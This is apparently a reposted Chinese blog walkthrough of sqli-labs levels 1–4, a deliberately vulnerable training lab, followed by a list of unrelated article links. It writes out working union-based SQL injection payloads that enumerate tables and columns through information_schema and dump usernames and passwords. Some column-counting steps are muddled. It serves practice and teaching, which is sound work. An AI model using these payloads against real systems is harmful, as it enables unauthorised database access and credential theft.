博客
关于我
sqli-lab闯关1—4
阅读量:690 次
发布时间:2019-03-17

本文共 1256 字,大约阅读时间需要 4 分钟。

《数据库注入实战》

第一关:单引号注入

第一步:判断闭合符号

输入单引号 ',检查报错信息。报错表明输入内容被放入一对单引号中。记住,这里报错是为了确认注入类型。

第二步:判断列数

输入 ?id=1' order by 1 -- 发现报错,尝试改为 ?id=2, ?id=3 等,直到报错为止。例如,到 ?id=4 报错,说明可用列数为4。

第三步:联合注入爆数据库名

尝试 ?id=0' union select 1,2,database() --,发现可以提取数据库名称。

第四步:爆数据表

使用 ?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --Get all tables in the database.

第五步:爆字段

利用 ?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --Get all columns of the users table.

第六步:爆值

尝试 ?id=0' union select 1,2,group_concat(username,0x3a,password) from users --,这样可以获取用户名和密码。注意,0x3a 表示冒号 :

第二关:数字型注入

第一步:判断闭合符号

输入 ?id=1',发现无需单引号即可完成注入。

第二步:判断列数

与第一关类似,使用 ?id=1 order by 1, ?id=2 等,直到报错确定可用列数。

优化提示:

此关的目标是直接注入数字值,可以省略 SQL 注入的常数处理步骤。

第三关:圆括号注入(模糊点)

第一步:判断闭合符号

输入单引号 发现报错,但随后尝试圆括号 (), 无报错表明此关的注入类型为圆括号。

第二步:判断列数

使用 ?id=1... 一步步测试,发现可用列数为4。

第四关:双引号注入

第一步:判断闭合符号

尝试双引号 ",报错表明注入类型为双引号。

第二步:判断列数

输入 ?id=1" order by 1 等,确定可用列数为4。

第三步:联合注入爆数据库名

尝试 ?id=0" union select 1,2,database() -- 获取数据库名称。

第四步:爆数据表

使用 ?id=0" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() 获取所有表名。

总结

通过一步步尝试不同的注入类型和闭合符号,可以有效利用数据库注入技术获取所需信息。每关结尾记得清理SQL会话以避免干扰。

转载地址:http://ppshz.baihongyu.com/

你可能感兴趣的文章
NIO ByteBuffer实现原理
查看>>
Nio ByteBuffer组件读写指针切换原理与常用方法
查看>>
NIO Selector实现原理
查看>>
nio 中channel和buffer的基本使用
查看>>
NISP一级,NISP二级报考说明,零基础入门到精通,收藏这篇就够了
查看>>
Nitrux 3.8 发布!性能全面提升,带来非凡体验
查看>>
NI笔试——大数加法
查看>>
NLP 基于kashgari和BERT实现中文命名实体识别(NER)
查看>>
NLP学习笔记:使用 Python 进行NLTK
查看>>
NLP问答系统:使用 Deepset SQUAD 和 SQuAD v2 度量评估
查看>>
NLP:使用 SciKit Learn 的文本矢量化方法
查看>>
Nmap扫描教程之Nmap基础知识
查看>>
Nmap端口扫描工具Windows安装和命令大全(非常详细)零基础入门到精通,收藏这篇就够了
查看>>
NMAP网络扫描工具的安装与使用
查看>>
NMF(非负矩阵分解)
查看>>
NN&DL4.1 Deep L-layer neural network简介
查看>>
NN&DL4.3 Getting your matrix dimensions right
查看>>
NN&DL4.8 What does this have to do with the brain?
查看>>
No 'Access-Control-Allow-Origin' header is present on the requested resource.
查看>>
NO 157 去掉禅道访问地址中的zentao
查看>>